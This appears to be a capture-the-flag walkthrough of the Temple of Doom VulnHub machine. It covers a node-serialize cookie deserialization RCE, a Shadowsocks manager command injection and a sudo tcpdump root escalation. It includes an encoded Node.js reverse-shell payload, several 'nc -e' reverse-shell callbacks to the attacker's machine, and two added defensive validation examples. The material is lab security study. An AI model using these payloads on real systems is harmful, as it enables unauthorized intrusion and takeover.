
Temple of Doom: VM walkthrough notes

☕ 12 min · ✍️ IceKam

VM name: Temple of Doom: 1

Difficulty: easy / medium

Note: there are 2 ways to get root!

Download: https://www.vulnhub.com/entry/temple-of-doom-1,243/

Reconnaissance

Finding the target's IP address

A simple nmap -sn sweep is enough to find the target's IP address.

$ nmap -sn 192.168.1.1-254
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-29 22:38 CST
Nmap scan report for 192.168.1.185
Host is up (0.000076s latency).
MAC Address: 08:00:27:55:15:E9 (Oracle VirtualBox virtual NIC)
Host is up.
  • The target's IP address is 192.168.1.185.
$ nmap -sC -sV -vv -p- 192.168.1.185
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-30 08:05 CST
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 08:05
Completed NSE at 08:05, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 08:05
Completed NSE at 08:05, 0.00s elapsed
Initiating ARP Ping Scan at 08:05
Scanning 192.168.1.185 [1 port]
Completed ARP Ping Scan at 08:05, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:05
Completed Parallel DNS resolution of 1 host. at 08:05, 0.00s elapsed
Initiating SYN Stealth Scan at 08:05
Scanning 192.168.1.185 [65535 ports]
Discovered open port 22/tcp on 192.168.1.185
Discovered open port 666/tcp on 192.168.1.185
Completed SYN Stealth Scan at 08:05, 1.57s elapsed (65535 total ports)
Initiating Service scan at 08:05
Scanning 2 services on 192.168.1.185
Completed Service scan at 08:05, 11.02s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.1.185.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 08:05
Completed NSE at 08:05, 1.11s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 08:05
Completed NSE at 08:05, 0.00s elapsed
Nmap scan report for 192.168.1.185
Host is up, received arp-response (0.00017s latency).
Scanned at 2018-10-30 08:05:31 CST for 14s
Not shown: 65533 closed ports
Reason: 65533 resets
PORT    STATE SERVICE REASON         VERSION
22/tcp  open  ssh     syn-ack ttl 64 OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 95:68:04:c7:42:03:04:cd:00:4e:36:7e:cd:4f:66:ea (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCm9vS4Orpm7HKPXTlmMkNuL0aaGP0KU9hNXxnM8H1mWbttFgm4OX3n0HDWYS8SZJrLIG0+nyEu82RQ2Z4MsDuY85OaT+Zxo0Ax+8E+pZ/dsQhmJ+5hIRxMwG2hEG5QGNaCXPeYfplLNIxOWq/JTEyoDtu/nscwlXrJ4uE++jchxcV7mI/P0GvO3/AmgIO9tOqLW2NRiK0n54hU03qTsOGYWblexneNpG+h2RtrBbMB546Ud4KtUzn3dece7bE+0B7jzwj/OFkvYJvX0GmJMJZ3qRM5Rtz4J5U0y8bLiLdRLQboXYiLPoJ7IiUTG41ZlScX8itvK9JSHb6reHTV81Dd
|   256 c3:06:5f:7f:17:b6:cb:bc:79:6b:46:46:cc:11:3a:7d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEMiN8ZmA/iqZ5k4n8OZAV/LVRXb8IfG1fR2ytPKaWAYG8NUpaSGvyBwcdcelrTwkQ3YdAJFVMlYSmHUXfaj9ro=
|   256 63:0c:28:88:25:d5:48:19:82:bb:bd:72:c6:6c:68:50 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDOa17e7aQPKX+FBRSV4VPoDc1JQ/ky5zf2gX1d0oVa8
666/tcp open  http    syn-ack ttl 64 Node.js Express framework
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
MAC Address: 08:00:27:55:15:E9 (Oracle VirtualBox virtual NIC)

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 08:05
Completed NSE at 08:05, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 08:05
Completed NSE at 08:05, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.36 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
  • Ports 22 and 666 are open.

Web reconnaissance

Open ip:666 in a browser; after refreshing, a deserialization error shows up.

at Object.exports.unserialize (/home/nodeadmin/.web/node_modules/node-serialize/lib/serialize.js:62:16)
  • Because two requests returned different content, we open Burp Suite to look at the request.

GET / HTTP/1.1
Host: 192.168.1.185:666
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
DNT: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: profile=eyJ1c2VybmFtZSI6IkFkbWluIiwiY3NyZnRva2VuIjoidTMydDRvM3RiM2dnNDMxZnMzNGdnZGdjaGp3bnphMGw9IiwiRXhwaXJlcz0iOkZyaWRheSwgMTMgT2N0IDIwMTggMDA6MDA6MDAgR01UIn0%3D
Connection: close

  • The profile value is encoded; let's decode it.

Using Burp Suite's built-in base64 decoder gives the following.

profile={"username":"Admin","csrftoken":"u32t4o3tb3gg431fs34ggdgchjwnza0l=","Expires=":Friday, 13 Oct 2018 00:00:00 GMTIn0%3D

After staring at it for a while, it turns out to be a syntax error; we correct the decoded content, re-encode it, and resubmit.

profile={"username":"Admin","csrftoken":"u32t4o3tb3gg431fs34ggdgchjwnza0l=","Expires=":"Friday, 13 Oct 2018 00:00:00 GMT"}
  • If it is correct, the page responds with Hello Admin.

Exploitation

Getting the PoC and setting up

Searching Google for "Node.js deserialization bug" turns up PoC code; there is also a Metasploit module, but here I use the PoC directly.
The PoC is at:

https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py

The PoC needs some dependencies; install them with:

python -m pip install -U "pylint<2.0.0" --user

Reverse shell with the PoC

Run the PoC to generate the payload.

$ python icekamtest.py 192.168.1.122 8612
[+] LHOST = 192.168.1.122
[+] LPORT = 8612
[+] Encoding
eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,57,50,46,49,54,56,46,49,50,51,46,49,50,50,34,59,10,80,79,82,84,61,34,56,54,49,50,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,39,47,98,105,110,47,115,104,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111,110,40,99,111,100,101,44,
115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))

First nc reverse shell

$ nc -vlp 8612
listening on [any] 8612 ...

Submitting the PoC with Burp Suite

Take the parameters we just corrected, add the payload, base64-encode the result and submit it.
Before encoding, the format is:

{"username":"Admin","csrftoken":"u32t4o3tb3gg431fs34ggdgchjwnza0l=","Expires=":"Friday, 13 Oct 2018 00:00:00 GMT", "rce":"_$$ND_FUNC$$_function(){eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,57,50,46,49,54,56,46,49,50,51,46,49,50,50,34,59,10,80,79,82,84,61,34,56,54,49,50,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,39,47,98,105,110,47,115,104,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,10
5,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111,110,40,99,111,100,101,44,115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))}()"}

Base64-encode and submit

GET / HTTP/1.1
Host: 192.168.1.185:666
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
DNT: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: profile=<base64-encoded payload omitted>
If-None-Match: W/"24-xWt5IUP3GfGbHraPgY5EGPpcNzA"
Connection: close

The reverse shell comes back.

$ nc -vlp 8612
listening on [any] 8612 ...
192.168.1.185: inverse host lookup failed: Unknown host
connect to [192.168.1.122] from (UNKNOWN) [192.168.1.185] 35516
Connected!
ls -la
total 40
drwx------. 5 nodeadmin nodeadmin 4096 Jun  7 23:05 .
drwxr-xr-x. 4 root      root      4096 Jun  2 23:02 ..
-rw-------. 1 nodeadmin nodeadmin    1 Jun  7 23:04 .bash_history
-rw-r--r--. 1 nodeadmin nodeadmin   18 Mar 15  2018 .bash_logout
-rw-r--r--. 1 nodeadmin nodeadmin  193 Mar 15  2018 .bash_profile
-rw-r--r--. 1 nodeadmin nodeadmin  231 Mar 15  2018 .bashrc
drwx------  3 nodeadmin nodeadmin 4096 Jun  1 13:24 .config
-rw-------  1 nodeadmin nodeadmin   16 Jun  3 16:41 .esd_auth
drwxr-xr-x  4 nodeadmin nodeadmin 4096 Jun  3 00:58 .forever
drwxrwxr-x. 3 nodeadmin nodeadmin 4096 May 30 17:44 .web

Upgrade to an interactive shell:

which python
/usr/bin/python
python -c 'import pty; pty.spawn("/bin/sh")'
sh-4.4$ /bin/bash
/bin/bash
[nodeadmin@localhost ~]$
  • This is not root, so what do we do next?
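
Seen from the defender's side, the root cause is that server.js hands the cookie to node-serialize's unserialize(), which executes any value tagged with `_$$ND_FUNC$$_`. The following is an added example, not code from the original post or from the VM's server.js, showing how the profile cookie could be decoded and validated safely: URL-decode, base64-decode, refuse any text carrying the function marker, then JSON.parse against an explicit field list. All cookie values below are constructed; the field names mirror the cookie shown above.

```javascript
// Added example (not the VM's server.js): decode and validate the "profile"
// cookie with JSON.parse and an explicit allowlist instead of
// node-serialize's unserialize(), which executes values tagged with the
// marker below.
const FUNC_MARKER = '_$$ND_FUNC$$_';
const ALLOWED_KEYS = new Set(['username', 'csrftoken', 'Expires=']);

// The browser sends the cookie URL-encoded ("%3D" for "="), wrapping base64.
function decodeProfileCookie(raw) {
  const b64 = decodeURIComponent(raw);
  return Buffer.from(b64, 'base64').toString('utf8');
}

// Inverse of decodeProfileCookie, used to build the constructed samples.
function encodeProfileCookie(obj) {
  const b64 = Buffer.from(JSON.stringify(obj), 'utf8').toString('base64');
  return encodeURIComponent(b64);
}

// Returns { ok: true, profile } for a well-formed cookie, otherwise
// { ok: false, reason } with a short machine-readable reason.
function parseProfile(raw) {
  let text;
  try {
    text = decodeProfileCookie(raw);
  } catch (e) {
    return { ok: false, reason: 'undecodable' };
  }
  // A legitimate profile never contains a serialized function, so reject
  // the marker before parsing rather than trusting the parser to ignore it.
  if (text.includes(FUNC_MARKER)) {
    return { ok: false, reason: 'function-marker' };
  }
  let obj;
  try {
    obj = JSON.parse(text); // never evaluates code, unlike unserialize()
  } catch (e) {
    return { ok: false, reason: 'invalid-json' };
  }
  if (obj === null || typeof obj !== 'object' || Array.isArray(obj)) {
    return { ok: false, reason: 'not-an-object' };
  }
  for (const key of Object.keys(obj)) {
    if (!ALLOWED_KEYS.has(key)) return { ok: false, reason: 'unexpected-key:' + key };
    if (typeof obj[key] !== 'string') return { ok: false, reason: 'non-string:' + key };
  }
  if (!/^[A-Za-z0-9_]{1,32}$/.test(obj.username || '')) {
    return { ok: false, reason: 'bad-username' };
  }
  return { ok: true, profile: { username: obj.username, csrftoken: obj.csrftoken || '' } };
}

// Constructed samples. GOOD_COOKIE has the same fields as the cookie in the post.
const GOOD_COOKIE = encodeProfileCookie({
  username: 'Admin',
  csrftoken: 'u32t4o3tb3gg431fs34ggdgchjwnza0l=',
  'Expires=': 'Friday, 13 Oct 2018 00:00:00 GMT',
});
// Same shape as the post's broken cookie: the Expires value lacks its opening quote.
const MALFORMED_COOKIE = encodeURIComponent(
  Buffer.from('{"username":"Admin","Expires=":Friday, 13 Oct 2018 00:00:00 GMT"}').toString('base64'));
// Extra key whose value carries the node-serialize function marker (harmless body).
const MARKER_COOKIE = encodeProfileCookie({
  username: 'Admin',
  rce: FUNC_MARKER + 'function(){ return 1 }()',
});
// Extra key without the marker: rejected by the key allowlist instead.
const EXTRA_KEY_COOKIE = encodeProfileCookie({ username: 'Admin', role: 'admin' });

// Run all four samples through the validator and return the verdicts.
function demo() {
  return [GOOD_COOKIE, MALFORMED_COOKIE, MARKER_COOKIE, EXTRA_KEY_COOKIE].map(parseProfile);
}

console.log(demo());
```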

Privilege escalation

System enumeration

First, run the usual enumeration commands.

[nodeadmin@localhost ~]$ uname -a
uname -a
Linux localhost.localdomain 4.16.3-301.fc28.x86_64 #1 SMP Mon Apr 23 21:59:58 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
[nodeadmin@localhost ~]$ crontab -l
crontab -l
@reboot /bin/node /home/nodeadmin/.web/server.js &
[nodeadmin@localhost ~]$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
systemd-coredump:x:999:996:systemd Core Dumper:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:998:995:User for polkitd:/:/sbin/nologin
geoclue:x:997:993:User for geoclue:/var/lib/geoclue:/sbin/nologin
colord:x:996:992:User for colord:/var/lib/colord:/sbin/nologin
rtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin
pulse:x:171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
gluster:x:995:989:GlusterFS daemons:/run/gluster:/sbin/nologin
qemu:x:107:107:qemu user:/:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
chrony:x:994:988::/var/lib/chrony:/sbin/nologin
dnsmasq:x:987:987:Dnsmasq DHCP and DNS server:/var/lib/dnsmasq:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
openvpn:x:986:986:OpenVPN:/etc/openvpn:/sbin/nologin
radvd:x:75:75:radvd user:/:/sbin/nologin
saslauth:x:985:76:Saslauthd user:/run/saslauthd:/sbin/nologin
nm-openvpn:x:984:983:Default user for running openvpn spawned by NetworkManager:/:/sbin/nologin
nm-openconnect:x:983:982:NetworkManager user for OpenConnect:/:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
pipewire:x:982:980:PipeWire System Daemon:/var/run/pipewire:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
gnome-initial-setup:x:981:979::/run/gnome-initial-setup/:/sbin/nologin
vboxadd:x:980:1::/var/run/vboxadd:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
nginx:x:979:977:Nginx web server:/var/lib/nginx:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
webalizer:x:67:976:Webalizer:/var/www/usage:/sbin/nologin
nodeadmin:x:1001:1001::/home/nodeadmin:/bin/bash
fireman:x:1002:1002::/home/fireman:/bin/bash
  • Naturally I also looked for kernel or system vulnerabilities, but this box is not that simple.
  • Then I looked at the users; there are a ridiculous number of them, and fireman looks like the interesting one.

Check network connections:

netstat -ant
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 192.168.1.185:35528     192.168.1.122:8612      ESTABLISHED
tcp6       0      0 :::22                   :::*                    LISTEN
tcp6       0      0 :::666                  :::*                    LISTEN
[nodeadmin@localhost ~]$ netstat -aux
netstat -aux
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
udp        0      0 0.0.0.0:bootpc          0.0.0.0:*
udp        0      0 localhost:323           0.0.0.0:*
udp     9984      0 0.0.0.0:mdns            0.0.0.0:*
udp        0      0 0.0.0.0:54947           0.0.0.0:*
udp6       0      0 [::]:33082              [::]:*
udp6       0      0 localhost:323           [::]:*
udp6   13824      0 [::]:mdns               [::]:*
  • Port 8612 shows up, which looks like a Shadowsocks port.

Second nc reverse shell

It turns out to be the Shadowsocks (ss) port, which can be exploited with another reverse shell.

$ nc -vlp 8125
  • Start a new nc listener.
[nodeadmin@localhost ~]$ nc -u 127.0.0.1 8839
nc -u 127.0.0.1 8839
add: {"server_port":8003, "password":"test", "method":"|| nc -e /bin/sh 192.168.1.122 8125 ||"}
  • Have ss add a server entry whose method field carries the remote nc command.
connect to [192.168.1.122] from (UNKNOWN) [192.168.1.185] 59280
  • Connected.
python -c 'import pty;pty.spawn("/bin/bash")'
  • Upgrade to an interactive shell.
[fireman@localhost root]$ pwd
pwd
/root
  • Check the directory permissions; no access.
[fireman@localhost tmp]$ cd /home
cd /home
[fireman@localhost home]$ ls
ls
fireman  nodeadmin
[fireman@localhost home]$ cd fireman
cd fireman
[fireman@localhost ~]$ ls
ls
[fireman@localhost ~]$ ls -la
ls -la
total 44
drwx------  6 fireman fireman 4096 Jun  7 23:10 .
drwxr-xr-x. 4 root    root    4096 Jun  2 23:02 ..
-rw-------  1 fireman fireman 2151 Jun  7 22:33 .bash_history
-rw-r--r--  1 fireman fireman   18 Mar 15  2018 .bash_logout
-rw-r--r--  1 fireman fireman  193 Mar 15  2018 .bash_profile
-rw-r--r--  1 fireman fireman  231 Mar 15  2018 .bashrc
drwx------  3 fireman fireman 4096 Jun  3 01:12 .config
-rw-------  1 fireman fireman   16 Jun  3 01:12 .esd_auth
drwxr-xr-x  4 fireman fireman 4096 Apr 25  2018 .mozilla
drwxrwxr-x  2 fireman fireman 4096 Jun  3 01:55 .shadowsocks
drwx------  2 fireman fireman 4096 Jun  2 22:39 .ssh
[fireman@localhost ~]$ udo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root
<eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root
bash: udo: command not found
[fireman@localhost ~]$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root
<eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
Maximum file limit reached: 1
1 packet captured
16 packets received by filter
0 packets dropped by kernel
  • Changed into fireman's home directory and listed it successfully.
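
The ss-manager add message earlier in this section works because the fields of the JSON body end up on a command line, so a shell fragment in method gets executed. As an added example (not shadowsocks' own code), here is how a manager-style control line could be parsed and validated before any of its fields could reach a process: the cipher name must come from an allowlist, the port must be a plain integer, and the password must not carry shell metacharacters. The allowlist contents and the sample lines are constructed; the injected sample uses a harmless command in place of the one in the post.

```javascript
// Added example (not shadowsocks' own code): parse ss-manager style control
// lines such as 'add: {"server_port":..,"password":..,"method":..}' and
// validate every field before any of them could reach a command line.
// ALLOWED_METHODS is a constructed allowlist, not the real cipher table.
const ALLOWED_METHODS = new Set(['aes-128-gcm', 'aes-256-gcm', 'chacha20-ietf-poly1305']);
const ALLOWED_COMMANDS = new Set(['add', 'remove', 'ping']);

// Split "verb: {json}" (body optional, as for "ping") into verb and args.
function parseControlLine(line) {
  const m = /^([a-z]+)(?:\s*:\s*(.*))?$/.exec(line.trim());
  if (!m) return { ok: false, reason: 'malformed-line' };
  const command = m[1];
  const body = m[2] || '';
  if (!ALLOWED_COMMANDS.has(command)) return { ok: false, reason: 'unknown-command' };
  let args = {};
  if (body.length > 0) {
    try {
      args = JSON.parse(body);
    } catch (e) {
      return { ok: false, reason: 'invalid-json' };
    }
  }
  if (args === null || typeof args !== 'object' || Array.isArray(args)) {
    return { ok: false, reason: 'args-not-object' };
  }
  return { ok: true, command, args };
}

// Strict per-field checks for "add": integer port, plain-character password,
// and a cipher name taken from the allowlist. Anything that only makes sense
// to a shell (pipes, quotes, spaces) fails these checks.
function validateAdd(args) {
  const port = args.server_port;
  if (!Number.isInteger(port) || port < 1 || port > 65535) {
    return { ok: false, reason: 'bad-port' };
  }
  if (typeof args.password !== 'string' || !/^[A-Za-z0-9_.-]{1,64}$/.test(args.password)) {
    return { ok: false, reason: 'bad-password' };
  }
  if (typeof args.method !== 'string' || !ALLOWED_METHODS.has(args.method)) {
    return { ok: false, reason: 'bad-method' };
  }
  return { ok: true };
}

// Parse, then validate according to the verb. Returns { ok, command, ... }
// on success or { ok: false, reason } on the first failing check.
function checkControlLine(line) {
  const parsed = parseControlLine(line);
  if (!parsed.ok) return parsed;
  if (parsed.command === 'add') {
    const v = validateAdd(parsed.args);
    return v.ok ? { ok: true, command: 'add', port: parsed.args.server_port } : v;
  }
  return { ok: true, command: parsed.command };
}

// Constructed samples: a legitimate add, and one whose "method" is a shell
// fragment of the kind shown in the post (with a harmless command).
const BENIGN_LINE = 'add: {"server_port":8003, "password":"test", "method":"aes-256-gcm"}';
const INJECTED_LINE = 'add: {"server_port":8003, "password":"test", "method":"|| id ||"}';

console.log(checkControlLine(BENIGN_LINE), checkControlLine(INJECTED_LINE));
```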

Third nc reverse shell

I then tried various privilege escalation tools with no luck; after some searching, I found that the following technique works.

$ nc -vlp 8128
  • Start another nc listener.
touch /tmp/exploit
[fireman@localhost tmp]$ chmod +x /tmp/exploit
chmod +x /tmp/exploit
[fireman@localhost tmp]$ echo "id" > /tmp/exploit
echo "id" > /tmp/exploit
[fireman@localhost tmp]$ /tmp/exploit
/tmp/exploit
uid=1002(fireman) gid=1002(fireman) groups=1002(fireman)
[fireman@localhost tmp]$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root
<eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
Maximum file limit reached: 1
1 packet captured
11 packets received by filter
0 packets dropped by kernel
[fireman@localhost tmp]$ uid=0(root) gid=0(root) groups=0(root)
echo "nc -e /bin/bash 192.168.1.122 8128" > /tmp/exploit
<c -e /bin/bash 192.168.1.122 8128" > /tmp/exploit
[fireman@localhost tmp]$ echo "nc -e /bin/bash 192.168.1.122 8128" > /tmp/exploit
<c -e /bin/bash 192.168.1.122 8128" > /tmp/exploit
[fireman@localhost tmp]$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root
<eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
Maximum file limit reached: 1
1 packet captured
10 packets received by filter
0 packets dropped by kernel
  • Use tcpdump to execute a script in /tmp as root, and let that script call back with nc.
$ nc -vlp 8128
listening on [any] 8128 ...
192.168.1.185: inverse host lookup failed: Unknown host
connect to [192.168.1.122] from (UNKNOWN) [192.168.1.185] 42510
python -c 'import pty;pty.spawn("/bin/bash")'
[root@localhost tmp]# ls -la
ls -la
total 8
drwxrwxrwt  11 root      root       240 Oct 30 13:13 .
dr-xr-xr-x. 18 root      root      4096 May 30 18:43 ..
drwx------   2 root      root        60 Oct 30 12:41 .esd-0
drwx------   2 nodeadmin nodeadmin   60 Oct 30 12:41 .esd-1001
-rwxrwxr-x   1 fireman   fireman     37 Oct 30 13:16 exploit
drwxrwxrwt   2 root      root        40 Oct 30 12:41 .font-unix
